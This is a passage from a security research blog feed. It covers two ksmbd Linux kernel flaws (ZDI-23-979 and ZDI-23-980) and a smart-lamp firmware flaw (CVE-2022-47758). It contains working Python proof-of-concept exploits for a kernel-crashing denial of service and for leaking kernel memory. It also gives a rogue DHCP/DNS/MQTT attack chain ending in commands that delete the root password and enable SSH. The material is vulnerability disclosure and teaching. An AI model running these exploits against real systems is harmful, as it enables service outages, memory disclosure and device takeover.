	// [snip] (initialize buffers) 

	if (conn->ops->check_user_session) {
		rc = conn->ops->check_user_session(work);

		// if rc != 0 goto send (auth failed)
		if (rc < 0) {
			command = conn->ops->get_cmd_val(work);
			conn->ops->set_rsp_status(work,
					STATUS_USER_SESSION_DELETED);
			goto send;
		} else if (rc > 0) {
			rc = conn->ops->get_ksmbd_tcon(work);
			if (rc < 0) {
				conn->ops->set_rsp_status(work,
					STATUS_NETWORK_NAME_DELETED);
				goto send;
			}
		}
	}

	do {
		rc = __process_request(work, conn, &command);
		if (rc == SERVER_HANDLER_ABORT)
			break;

	    // [snip] (set SMB credits)
	} while (is_chained_smb2_message(work));

	if (work->send_no_response)
		return;

send:
	// [snip] (send response)
}

__handle_ksmbd_work - session handling and request processing per packet.

The function conn->ops->check_user_session(work) checks whether the pending request requires a session, and if it does, it checks req_hdr->SessionId against existing sessions, whereby req_hdr->SessionId is randomly generated during SMB login. If the session check succeeds, then work->sess = ksmbd_session_lookup_all(conn, sess_id); if the request does not require a session, then work->sess = NULL.

int smb2_check_user_session(struct ksmbd_work *work)
{
	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
	struct ksmbd_conn *conn = work->conn;
	unsigned int cmd = conn->ops->get_cmd_val(work);
	unsigned long long sess_id;

	/*
	 * SMB2_ECHO, SMB2_NEGOTIATE, SMB2_SESSION_SETUP command do not
	 * require a session id, so no need to validate user session's for
	 * these commands.
	 */
	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
	    cmd == SMB2_SESSION_SETUP_HE)
		return 0;

	// [snip] (check conn quality)

	sess_id = le64_to_cpu(req_hdr->SessionId);

	// [snip] (chained request logic that was unused)

	/* Check for validity of user session */
	work->sess = ksmbd_session_lookup_all(conn, sess_id);
	if (work->sess)
		return 1;
	
    // [snip] (invalid session handling)
}

smb2_check_user_session - codeblock of SMB validation checks.

Obviously, when the first command is e.g. SMB2_ECHO_HE and the second command is e.g. SMB2_WRITE, the work->sess variable will be NULL in smb2_write(). This will cause a dereference like work->sess->x and hence a NULL pointer dereference. Since NULL pointer dereferences panic the kernel thread, the SMB server will be taken offline while the rest of the kernel remains online. The proof-of-concept exploit for this vulnerability is as follows:

#!/usr/bin/env python3

from impacket import smb3, nmb
from pwn import p64, p32, p16, p8


def main():
    print("[*] connecting to SMB server (no login)...")

    try:
        conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445, timeout=3)
    except nmb.NetBIOSTimeout:
        print("[!] SMB server is already offline (connection timeout)")
        return

    # generate innocent SMB_ECHO request
    request_echo = smb3.SMB3Packet()
    request_echo['Command'] = smb3.SMB2_ECHO
    request_echo["Data"] = p16(4) + p16(0)
    request_echo["NextCommand"] = 64+4  # set NextCommand to indicate request chaining

    # generate innocent SMB_WRITE request
    request_write = smb3.SMB3Packet()
    request_write['Command'] = smb3.SMB2_WRITE
    request_write["Data"] = p16(49) + p16(0) + p32(0) + p64(0) + p64(0) + p64(0) + p32(0) + p32(0) + p16(0) + p16(0) + p32(0) + p8(0)
    request_write["TreeID"] = 0

    # chain SMB_WRITE to SMB_ECHO
    request_echo["Data"] += request_write.getData()

    print('[*] sending DoS packet...')
    conn.sendSMB(request_echo)

    print("[*] probing server health...")

    try:
        smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445, timeout=3)
        print("[!] exploit failed - server remains online")
    except nmb.NetBIOSTimeout:
        print("[+] exploit succeeded - server is now offline")


if __name__ == "__main__":
    main()

Proof-of-Concept (PoC) exploit for ZDI-23-979 written in Python code. 

The most important part of the patch is moving the session check into the chained-request loop, which results in the session check being executed for each chained request in the packet, instead of just the first one.

+++ b/fs/ksmbd/server.c
@@ -184,24 +184,31 @@ static void __handle_ksmbd_work(struct k
 		goto send;
 	}
 
-	if (conn->ops->check_user_session) {
-		rc = conn->ops->check_user_session(work);
-		if (rc < 0) {
-			command = conn->ops->get_cmd_val(work);
-			conn->ops->set_rsp_status(work,
-					STATUS_USER_SESSION_DELETED);
-			goto send;
-		} else if (rc > 0) {
-			rc = conn->ops->get_ksmbd_tcon(work);
+	do {
+		if (conn->ops->check_user_session) {
+			rc = conn->ops->check_user_session(work);
 			if (rc < 0) {
-				conn->ops->set_rsp_status(work,
-					STATUS_NETWORK_NAME_DELETED);
+				if (rc == -EINVAL)
+					conn->ops->set_rsp_status(work,
+						STATUS_INVALID_PARAMETER);
+				else
+					conn->ops->set_rsp_status(work,
+						STATUS_USER_SESSION_DELETED);
 				goto send;
+			} else if (rc > 0) {
+				rc = conn->ops->get_ksmbd_tcon(work);
+				if (rc < 0) {
+					if (rc == -EINVAL)
+						conn->ops->set_rsp_status(work,
+							STATUS_INVALID_PARAMETER);
+					else
+						conn->ops->set_rsp_status(work,
+							STATUS_NETWORK_NAME_DELETED);
+					goto send;
+				}
 			}
 		}
-	}
 
-	do {
 		rc = __process_request(work, conn, &command);
 		if (rc == SERVER_HANDLER_ABORT)
 			break;
--- a/fs/ksmbd/smb2pdu.c

The official patch for ZDI-23-979.

ZDI-23-980: Out-Of-Bounds Read Information Disclosure

ZDI-23-980 is a network-based (un)authenticated out-of-bounds read in the ksmbd subsystem of the Linux kernel, which allows a user to read up to 65536 consecutive bytes of kernel memory. The issue results from a buffer over-read, much like the Heartbleed vulnerability in SSL, where the request packet states that the packet content is larger than its actual size, resulting in the packet being parsed with a fake size.

This can be exploited by issuing an SMB_WRITE request with size N to the file "dump.bin", whereby the actual request content is smaller than N. Then, issue an SMB_READ request to download the "dump.bin" file, and eventually delete "dump.bin" to remove the exploitation traces.

When I was researching this vulnerability, I also found an unauthenticated OOB read of 2 bytes using SMB_ECHO, but I figured this was less important than the authenticated OOB read of 65536 bytes due to usability (whether or not this was the right decision is up for debate ;-) ). Hence, the CVE description says it's authenticated. I will also discuss the SMB_ECHO path and explain the exploitation behind it. The 2-byte OOB read consists of issuing an SMB_ECHO command with the last 2 bytes of the packet not being filled in.

The underlying issue

The underlying issue leading to the OOB read is improper validation of the SMB request packet parameter smb2_hdr.NextCommand, which contains the offset to the next command. When NextCommand is set, the SMB server assumes that the current command/request is NextCommand bytes long. Hence, when I have a packet of size N, I can set NextCommand to N+2, and the server will assume the packet is N+2 bytes long. This can be seen in action in the ksmbd_smb2_check_message and smb2_calc_size functions. The function ksmbd_smb2_check_message does several assertions/validations:

hdr->StructureSize == 64
pdu->StructureSize2 == smb2_req_struct_sizes[command]  // SMB2_WRITE: 49, SMB2_ECHO: 4
hdr->NextCommand == pdu->StructureSize2 + hdr->StructureSize  // SMB_ECHO
hdr->NextCommand == hdr->DataOffset + hdr->Length  // SMB_WRITE

The assertions put onto the packet, for validation.

But it does not assert work->next_smb2_rcv_hdr_off + hdr->NextCommand <= get_rfc1002_len(work->request_buf), which is the official patch.

static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
				  struct smb2_hdr *hdr)
{
	int ret = 0;

	*off = 0;
	*len = 0;

	switch (hdr->Command) {
	// [snip] not reached
	case SMB2_WRITE:
		if (((struct smb2_write_req *)hdr)->DataOffset ||
		    ((struct smb2_write_req *)hdr)->Length) {
			*off = max_t(unsigned int,
				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
				     offsetof(struct smb2_write_req, Buffer));
			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
			break;
		}

		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
		break;
	// [snip] not reached
	default:
		// [snip] not reached
	}

	// [snip] return error if offset > 4096

	return ret;
}

static int smb2_calc_size(void *buf, unsigned int *len)
{
	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
	struct smb2_hdr *hdr = &pdu->hdr;
	unsigned int offset; /* the offset from the beginning of SMB to data area */
	unsigned int data_length; /* the length of the variable length data area */
	int ret;

	*len = le16_to_cpu(hdr->StructureSize);
	*len += le16_to_cpu(pdu->StructureSize2);

	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false) {
		// SMB_ECHO will reach this
        goto calc_size_exit;
	}

	// SMB_WRITE will reach this
	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
    // [snip] return error if ret < 0

	if (data_length > 0) {
		// [snip] return error when data overlaps with next cmd

		*len = offset + data_length;
	}

calc_size_exit:
	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
	return 0;
}

int ksmbd_smb2_check_message(struct ksmbd_work *work)
{
	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
	struct smb2_hdr *hdr = &pdu->hdr;
	int command;
	__u32 clc_len;  /* calculated length */
	__u32 len = get_rfc1002_len(work->request_buf);

	if (le32_to_cpu(hdr->NextCommand) > 0)
		len = le32_to_cpu(hdr->NextCommand);
	else if (work->next_smb2_rcv_hdr_off)
		len -= work->next_smb2_rcv_hdr_off;

	// [snip] check flag in header

	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
		// [snip] return error
	}

	command = le16_to_cpu(hdr->Command);
	// [snip] check if command is valid

	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
		// [snip] return error (with exceptions)
	}

	if (smb2_calc_size(hdr, &clc_len)) {
		// [snip] return error (with exceptions)
	}

	if (len != clc_len) {
		// [snip] return error (with exceptions)
	}

validate_credit:
	// [snip] irrelevant credit check

	return 0;
}

The functions causing the vulnerability.

As you can see, for SMB_WRITE we can set an arbitrary packet size by setting the hdr->Length and hdr->NextCommand variables to complement each other. As for SMB_ECHO, we just need to set hdr->NextCommand to the expected value, without actually filling in smb2_echo_req->Reserved:

struct smb2_echo_req {
	struct smb2_hdr hdr;
	__le16 StructureSize;	/* Must be 4 */
	__u16  Reserved;
} __packed;

The smb2_echo_req struct.

Exploitation

To leak 2 bytes using SMB_ECHO:

  1. Set smb2_echo_req->StructureSize = p16(4)
  2. Set smb2_echo_req->hdr.NextCommand = sizeof(smb2_echo_req->hdr) + smb2_echo_req->StructureSize
  3. Send request
  4. Read echo response, with the last 2 bytes being an OOB read.
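The arithmetic behind these steps (plain Python; constants taken from the validation logic quoted earlier):

```python
# Constants from the validation logic quoted earlier: the SMB2 header is
# 64 bytes (hdr->StructureSize) and StructureSize2 for SMB2_ECHO is 4
# (the 2-byte StructureSize field plus the 2-byte Reserved field).
HDR_SIZE = 64
ECHO_STRUCTURE_SIZE2 = 4

claimed_len = HDR_SIZE + ECHO_STRUCTURE_SIZE2  # clc_len; NextCommand is set to match
sent_len = HDR_SIZE + 2                        # only StructureSize is sent, Reserved is omitted

oob_bytes = claimed_len - sent_len
print(claimed_len, sent_len, oob_bytes)        # 68 66 2
```

Because len == clc_len == 68, the length check passes even though only 66 bytes arrived, and the echo response reflects 2 out-of-bounds bytes.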
#!/usr/bin/env python3

from impacket import smb3
from pwn import p64, p32, p16, p8


def main():
    print("[*] connecting to SMB server...")
    conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445)

    packet = smb3.SMB3Packet()
    packet['Command'] = smb3.SMB2_ECHO
    packet["Data"] = p16(0x4)
    packet["NextCommand"] = 64+4

    print("[*] sending OOB read...")
    conn.sendSMB(packet)

    print("[*] reading response...")
    rsp = conn.recvSMB().rawData
    print(rsp)


if __name__ == "__main__":
    main()

ZDI-23-980 PoC exploit using SMB_ECHO

For the SMB_WRITE path, here's the struct and the steps:

struct smb2_write_req {
	struct smb2_hdr hdr;
	__le16 StructureSize; /* Must be 49 */
	__le16 DataOffset; /* offset from start of SMB2 header to write data */
	__le32 Length;
	__le64 Offset;
	__u64  PersistentFileId; /* opaque endianness */
	__u64  VolatileFileId; /* opaque endianness */
	__le32 Channel; /* MBZ unless SMB3.02 or later */
	__le32 RemainingBytes;
	__le16 WriteChannelInfoOffset;
	__le16 WriteChannelInfoLength;
	__le32 Flags;
	__u8   Buffer[];
} __packed;

The smb2_write_req struct.

  1. Set smb2_write_req->StructureSize = 49
  2. Set smb2_write_req->DataOffset = smb2_write_req->StructureSize + 64 so that the data area starts directly after the fixed-size request structure
  3. Set smb2_write_req->Length = 65536 to write 65536 bytes from the packet to the file
  4. Set smb2_write_req->hdr.NextCommand = smb2_write_req->Length + smb2_write_req->DataOffset to spoof the request size
  5. Open a file in the SMB share in read/write mode: file_id = smb_open("dump.bin", "rw")
  6. Set smb2_write_req->PersistentFileId = file_id
  7. Send the request
  8. Read the file in the SMB share: dump = smb_read(file_id)
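The size spoofing in steps 2-4 boils down to simple arithmetic (our own illustration of the values, matching the constants used in the PoC below):

```python
# Wire constants taken from the steps above
SMB2_HDR_SIZE = 64
StructureSize = 49                          # fixed smb2_write_req size
DataOffset = SMB2_HDR_SIZE + StructureSize  # data area starts right past the struct
Length = 0x10000                            # bytes the server will copy into the file

# NextCommand convinces ksmbd the request really spans that many bytes,
# so the write handler copies Length bytes starting at DataOffset -- almost
# all of which is adjacent kernel memory -- into the opened file.
NextCommand = DataOffset + Length

print(DataOffset, hex(NextCommand))  # 113 0x10071
```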
#!/usr/bin/env python3

from impacket import smb3
from pwn import p64, p32, p16, p8


def main(username: str, password: str, share: str, filename: str):
    print("[*] connecting to SMB server...")
    conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445)

    print(f"[*] logging into SMB server in (username: '{username}', password: '{password}')...")
    conn.login(user=username, password=password)

    print(f"[*] connecting to tree/share: '{share}'")
    tree_id = conn.connectTree(share)

    packet = smb3.SMB3Packet()
    packet['Command'] = smb3.SMB2_WRITE

    StructureSize = 49
    DataOffset = 64 + StructureSize  # fixed packet size excl buffer
    Length = 0x10000  # max credits: 8192, so max buffer: 8192*8 (0x10000), but max IO size: 4*1024*1024 (0x400000)

    # this is ugly but acquires a RW handle for the target file which will contain the leaked memory
    file_id = conn.create(tree_id, filename, desiredAccess=smb3.FILE_READ_DATA|smb3.FILE_SHARE_WRITE, creationDisposition=smb3.FILE_OPEN|smb3.FILE_CREATE,
                            creationOptions=smb3.FILE_NON_DIRECTORY_FILE, fileAttributes=smb3.FILE_ATTRIBUTE_NORMAL, shareMode=smb3.FILE_SHARE_READ|smb3.FILE_SHARE_WRITE)

    packet["Data"] = (p16(StructureSize) + p16(DataOffset) + p32(Length) + p64(0) + file_id[:8] + p64(0) + p32(0) + p32(0) + p16(0) + p16(0) + p32(0) + p8(0))
    packet["TreeID"] = tree_id
    packet["NextCommand"] = DataOffset+Length  # the end of the buffer is past the end of the packet

    print(f"[*] sending OOB read for 65536 bytes... (writing to file '{filename}')")
    conn.sendSMB(packet)

    print("[*] closing file descriptors...")
    conn.close(tree_id, file_id)  # close fd's bcs impacket is impacket

    print(f"[*] reading file containing kernel memory: '{filename}'")
    conn.retrieveFile(share, filename, print)  # print file (containing kmem dump)


if __name__ == "__main__":
    main("user", "pass", "files", "dump.bin")

ZDI-23-980 PoC exploit using SMB_WRITE

Conclusion

Thank you for reading my write-up on this Linux kernel vulnerability. I hope you learned about the ksmbd kernel subsystem and that you like the write-up style.

For questions, job inquiries, and other things, please send an email to notselwyn@pwning.tech (PGP key).

]]>
<![CDATA[How I hacked smart lights: the story behind CVE-2022-47758]]>Introduction

In this blogpost, we take a closer look at our research regarding CVE-2022-47758: a critical vulnerability impacting a very large number of Internet of Things smart devices. We could leverage this vulnerability in the lamp's firmware for unauthenticated remote code execution on the entire device with the

]]>
https://pwning.tech/cve-2022-47758/658f44f8d32e980001de21efWed, 08 Mar 2023 07:30:00 GMTIntroduction

In this blogpost, we take a closer look at our research regarding CVE-2022-47758: a critical vulnerability impacting a very large number of Internet of Things smart devices. We could leverage this vulnerability in the lamp's firmware for unauthenticated remote code execution on the entire device with the highest privileges and hence abuse it for information gathering (and for haunting someone in their own house). Additionally, we could pivot to the management devices using a vulnerability in the smart lamps' desktop management software (CVE-2022-46640). To make matters more interesting: the vulnerable traffic flowed through an encrypted outbound connection which means that it typically isn't blocked by a firewall. This blogpost serves as a cautionary tale for both vendors and consumers, highlighting the importance of IoT security. Join us as we dive into the technical details and lessons learned from our research.

Proof of Concept exploit

The goal of our proof of concept (PoC) exploit is proving that we can remotely execute code on our own smart lamps. For the PoC exploit we're redirecting local traffic destined for the vendor's MQTT(S) broker to our own machine via malicious DNS records. In practice, an attacker could perform this redirect by mounting a rogue DHCP server attack, hacking a router, hacking a DNS server, et cetera. Once we have control over the MQTT traffic, we send a debugging command to a debugging endpoint on our smart lamp. Finally, we activate a persistent OpenSSH server in order to easily access the lamp.

Methodology

We use the following conventions in this blogpost:

  • *.acme.org - the vendor domain names
  • mqtt.acme.org - the vendor MQTT broker domain name
  • 192.168.128.0/24 - our controlled network environment
  • 192.168.128.10 - our attacker machine
  • 192.168.128.20 - our vulnerable smart device

Spoofing DNS

In order to spoof DNS we need to set up a rogue DHCP server. The Dynamic Host Configuration Protocol (DHCP) is primarily used by network administrators to dynamically assign private IP addresses to devices on the network. However, DHCP packets also carry a few more interesting parameters: domain name server IP addresses, hostnames, and even gateway IP addresses. In order to MitM the MQTT traffic to mqtt.acme.org, we set the domain name server of the smart lamp to 192.168.128.10 by sending a malicious DHCP offer from our rogue DHCP server.
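The crucial piece of the rogue offer is DHCP option 6 (domain name server). As an illustration of what that option looks like on the wire, here's a hypothetical stdlib-only Python helper (a real attack uses a full DHCP server, as configured below):

```python
import socket

def build_dns_server_option(servers: list[str]) -> bytes:
    """Encode DHCP option 6 (Domain Name Server) as raw wire bytes:
    tag (6), payload length, then each IPv4 address as 4 bytes."""
    payload = b"".join(socket.inet_aton(ip) for ip in servers)
    return bytes([6, len(payload)]) + payload

# Point victims at our malicious resolver
print(build_dns_server_option(["192.168.128.10"]).hex())  # 0604c0a8800a
```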

We install isc-dhcp-server on our Linux machine and configure it to run maliciously on our local network environment (192.168.128.0/24), making the smart lamp use our own DNS resolver at 192.168.128.10. The configuration we use is as follows:

subnet 192.168.128.0 netmask 255.255.255.0 {
    range                           192.168.128.10 192.168.128.254;
    option broadcast-address        192.168.128.255;
    option routers                  192.168.128.1;
    option subnet-mask              255.255.255.0;
    option domain-name-servers      192.168.128.10;  # set DNS resolver

    host router {
        hardware ethernet <mac_router>;
        fixed-address 192.168.128.1;
    }

    host attacker {
        hardware ethernet <mac_attacker>;
        fixed-address 192.168.128.10;
    }

    host lamp {
        hardware ethernet <mac_lamp>;
        fixed-address 192.168.128.20;
    }
}

/etc/dhcp/dhcpd.conf - DHCP server configuration to spoof the DNS resolver

In order to change the IP address to which mqtt.acme.org points, we need to set up our own DNS resolver by installing bind9 and setting a custom DNS record for the zone mqtt.acme.org which points to our own MQTT broker:

;
; BIND data file for local loopback interface
;
$TTL	604800
@	IN	SOA	mqtt.acme.org. root.mqtt.acme.org. (
			      2		; Serial
			 604800		; Refresh
			  86400		; Retry
			2419200		; Expire
			 604800 )	; Negative Cache TTL

;
@	IN	NS	ns.mqtt.acme.org.
ns	IN	A	192.168.128.10
@	IN	A	192.168.128.10

/etc/bind/named.conf.local - malicious DNS record (redirects traffic to our malicious IP)

Setting up a malicious MQTT broker

Since mqtt.acme.org now resolves to our own IP address (192.168.128.10), we can eavesdrop on the traffic. However, in order to interact with this traffic, we need to set up an MQTT broker on 192.168.128.10. We do this so we can publish to a custom MQTT channel devoted to debugging (custom made by Acme). By publishing on this MQTT channel, we can execute commands. It's important that the server listens on port 443, has TLS encryption, and allows anonymous logins. Hence, if the smart lamp tries to connect to mqtts://nobody@mqtt.acme.org:443 it should succeed. We used the following configuration:

# Place your local configuration in /etc/mosquitto/conf.d/
#
# A full description of the configuration file is at
# /usr/share/doc/mosquitto/examples/mosquitto.conf.example

listener 443
cafile /etc/mosquitto/ca_certificates/ca.crt
keyfile /etc/mosquitto/certs/server.key
certfile /etc/mosquitto/certs/server.crt
tls_version tlsv1.2
allow_anonymous true
protocol mqtt

persistence true
persistence_location /var/lib/mosquitto/
log_dest file /var/log/mosquitto/mosquitto.log

include_dir /etc/mosquitto/conf.d

/etc/mosquitto/mosquitto.conf - malicious MQTT(S) broker that allows all logins

As you might have noticed, we are dealing with MQTTS. Like HTTPS, the S in MQTTS stands for Secure. In order to make such a protocol secure, we need to create TLS certificates so we can encrypt the MQTT traffic coming from our own MQTT broker. We can create such TLS certificates by running the following commands:

$ openssl genrsa -des3 -out /etc/mosquitto/ca_certificates/ca.key 2048
$ openssl req -new -x509 -days 1826 -key /etc/mosquitto/ca_certificates/ca.key -out /etc/mosquitto/certs/ca.crt
$ openssl genrsa -out /etc/mosquitto/certs/server.key 2048
$ openssl req -new -out /etc/mosquitto/certs/server.csr -key /etc/mosquitto/certs/server.key
$ openssl x509 -req -in /etc/mosquitto/certs/server.csr -CA /etc/mosquitto/certs/ca.crt -CAkey /etc/mosquitto/ca_certificates/ca.key -CAcreateserial -out /etc/mosquitto/certs/server.crt -days 1826

Creating TLS keys/certificates using OpenSSL (the last two commands issue the server certificate referenced by certfile)

Performing the exploit

Now that we have our infrastructure set up, we need to reboot the lamp so that it triggers a DHCP discover request as part of the Discover Offer Request Accept (DORA) sequence. The next part of the DORA sequence is 'Offer', where the server offers a new IP address (and our domain name server IP address) to our smart lamp. After that offer, the lamp's lookups for mqtt.acme.org resolve to 192.168.128.10.

We can confirm that the vulnerable smart lamp is using our own MQTT broker by inspecting the local traffic using Wireshark on 192.168.128.10. After the victim device has connected to our server, we want to activate an OpenSSH server. In order to do this, we create the /acme/ssh_enabled file, which enables persistent SSH access after the device reboots. We could probably do it without rebooting, but it would be a lot of unnecessary effort. After that, we stop the debugging of the touch command, and instead debug passwd -d root, which deletes the password of the root user. This is convenient, because the default password is unknown and this way we can reset the password without a TTY. Additionally, the SSH server allows passwordless logins. To pull it off, we execute the following commands using mosquitto_pub (which publishes messages to the Mosquitto broker):

$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

Sending our payloads to our own MQTT broker

Once we have started the OpenSSH server on the smart lamp, we can log into it by simply executing ssh root@192.168.128.20.

$ ssh root@192.168.128.20

root@192.168.128.20:~ $ uname -a
Linux AcmeProduct-MAC 4.14.195 #0 Sun Sep 6 16:19:39 2020 mips GNU/Linux

Analyzing the smart device firmware

Since we have access to the firmware, we can analyze it by extracting it using Binwalk - a tool for analyzing and extracting firmware. By running it with the -e (--extract) parameter, we can extract the firmware partitions. In our case, we can see that we have 3 partitions: a bootloader, a kernel, and an OpenWRT install (interestingly enough).

$ binwalk -e 4.5.1.firmware

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
80            0x50            uImage header, header size: 64 bytes, header CRC: 0xF012020D, created: 2020-09-06 16:19:39, image size: 1594132 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0xFB832D09, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-4.14.195"
144           0x90            LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 5029060 bytes
1594276       0x1853A4        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 7060690 bytes, 1210 inodes, blocksize: 262144 bytes, created: 2020-09-06 16:19:39

Binwalk output when extracting the firmware
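Under the hood, tools like binwalk find these offsets by scanning for known magic bytes. A minimal sketch of that idea for the little-endian SquashFS magic b'hsqs' (illustrative only - binwalk performs far more validation):

```python
def find_squashfs_offsets(firmware: bytes) -> list[int]:
    """Return every offset where the little-endian SquashFS magic occurs."""
    magic = b"hsqs"  # 'sqsh' byte-reversed: little-endian SquashFS
    offsets, pos = [], firmware.find(magic)
    while pos != -1:
        offsets.append(pos)
        pos = firmware.find(magic, pos + 1)
    return offsets

# Toy firmware blob with a "filesystem" at offset 0x50
blob = b"\x00" * 0x50 + b"hsqs" + b"\x00" * 16
print(find_squashfs_offsets(blob))  # [80]
```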

Enumerating the OpenWRT installation

The output of Binwalk includes a SquashFS filesystem instance which got carved out of the extracted partition. SquashFS performs heavy compression, and hence it was probably used by the smart lamp developers because it saves storage costs. Since SquashFS doesn't have different layers such as OverlayFS, we do not have any hassle fixing up the filesystem.

$ tree . -L 2
.
├── 4.5.1.firmware
└── squashfs
    ├── bin
    ├── dev
    ├── etc
    ├── lib
    ├── mnt
    ├── acme_config
    ├── overlay
    ├── proc
    ├── rom
    ├── root
    ├── sbin
    ├── sys
    ├── tmp
    ├── usr
    ├── var -> tmp
    └── www

The output directory of binwalk

One of the first things we did was verifying which OS we were working with and checking which users existed on the device. After we established that the lamp was running OpenWRT - a router OS, interestingly enough - and we couldn't find any custom users in /etc/passwd, we decided to look into the next interesting directory: /acme_config/.

$ cat etc/os-release                 
NAME="OpenWrt"
VERSION="19.07.4"
ID="openwrt"
ID_LIKE="lede openwrt"
PRETTY_NAME="OpenWrt 19.07.4"
VERSION_ID="19.07.4"
HOME_URL="https://openwrt.org/"
BUG_URL="https://bugs.openwrt.org/"
SUPPORT_URL="https://forum.openwrt.org/"
BUILD_ID="r11208-ce6496d796"
OPENWRT_BOARD="ramips/mt76x8"
OPENWRT_ARCH="mipsel_24kc"
OPENWRT_TAINTS="no-all busybox"
OPENWRT_DEVICE_MANUFACTURER="OpenWrt"
OPENWRT_DEVICE_MANUFACTURER_URL="https://openwrt.org/"
OPENWRT_DEVICE_PRODUCT="Generic"
OPENWRT_DEVICE_REVISION="v0"
OPENWRT_RELEASE="OpenWrt 19.07.4 r11208-ce6496d796"

/etc/os-release - OS related information

$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false

/etc/passwd - users on the device
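When triaging a passwd dump like the one above, a quick filter for accounts that can actually log in helps; a hypothetical throwaway helper:

```python
def login_capable_users(passwd: str) -> list[str]:
    """Return users whose login shell isn't a 'nologin' stub."""
    users = []
    for line in passwd.strip().splitlines():
        name, _pw, _uid, _gid, _gecos, _home, shell = line.split(":")
        if shell not in ("/bin/false", "/sbin/nologin", "/usr/sbin/nologin"):
            users.append(name)
    return users

passwd_dump = """root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false"""

print(login_capable_users(passwd_dump))  # ['root']
```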

We started searching in /acme_config/ for interesting keywords using queries such as grep -iRPe '(ssh)|(mqtt)|(ftp)|(api)' to find possibly exposed services as an attack surface. As we researched the binaries containing the specified keywords, we found out that a particular binary called ColorCC.bin contained the entire smart lamp API accessible via HTTP (built using the OpenAPI C++ SDK). We tried searching for memory corruption bugs for easy RCE but could not find any. Next, a binary called cloud_daemon caught our attention because it contained an MQTT client...

Investigating the MQTT handler

In order to grasp the internal logic of the cloud_daemon, we can open it in Ghidra. Ghidra is a software reverse engineering suite developed by the National Security Agency (NSA). We can use Ghidra to decompile Assembly instructions (the raw instructions that go into the CPU) into normal C, which is relatively readable by code monkeys like us.

void main(int argc,char **env)
{
  int iVar1;
  long lVar2;
  int i;
  char **ppcVar3;
  long port;
  char *pcVar4;
  char addr_str [128];
  pthread_t pThread;
  undefined4 uStack_34;
  char *pcStack_30;
  
  printf("This is Cloud Daemon version %s (%s)\n","1.12.0",
         "1.12.0 / Wed Aug 26 09:08:45 EDT 2020 / Backlog0740 / Color_develop");
  signal(2,ctrlc_handler);
  signal(0xf,ctrlc_handler);
  memset(addr_str,0,0x80);
  port = 0;
  do {
    if (argc <= 1) {
      // set MQTT channel variables
      sprintf(&update_server,"acme/device/%s/update/server",&ROM_SERIAL_NUMBER);
      sprintf(&update_client,"acme/device/%s/update/client",&ROM_SERIAL_NUMBER);
      sprintf(&exec_server,"acme/device/%s/exec/server",&ROM_SERIAL_NUMBER);
      sprintf(&exec_client,"acme/device/%s/exec/client",&ROM_SERIAL_NUMBER);
      sprintf(&uptime_server,"acme/device/%s/uptime/server",&ROM_SERIAL_NUMBER);
      sprintf(&uptime_client,"acme/device/%s/uptime/client",&ROM_SERIAL_NUMBER);

      // print which MQTT channels will be used for what
      printlog(3,"We will publish firmware communications to [%s]\n",&update_client);
      printlog(3,"We will receive firmware communications from [%s]\n",&update_server);
      printlog(3,"We will publish debug communications to [%s]\n",&exec_client);
      printlog(3,"We will receive debug communications from [%s]\n",&exec_server);
      printlog(3,"We will publish health communications to [%s]\n",&uptime_client);
      printlog(3,"We will receive health communications from [%s]\n",&uptime_server);
      
      set_host(addr_str, port);
     
      // creates posix thread to execute the start_firmware_checks() function
      while (iVar1 = pthread_create(&pThread, NULL, start_firmware_checks, &DAT_00414c84), iVar1 != 0 ) {
        printlog(1,"Error creating https upgrade check thread, retrying in %d seconds ...\n",timeout);
        printlog(1,"Error in (func, line): %s, %d\n", &function, 0x41f);
        sleep(timeout);
      }

      printlog(2, "Successfully launched https upgrade check thread\n");
      cloud_pipe_start(&ROM_DEVICE_ID,&ROM_SERIAL_NUMBER, channel, on_disconnect_cb, on_tick_cb, 1000);
      if (DAT_004152f0 != 0) {
        printlog(2, "Rebooting\n");
        system("reboot");
      }
      return;
    }
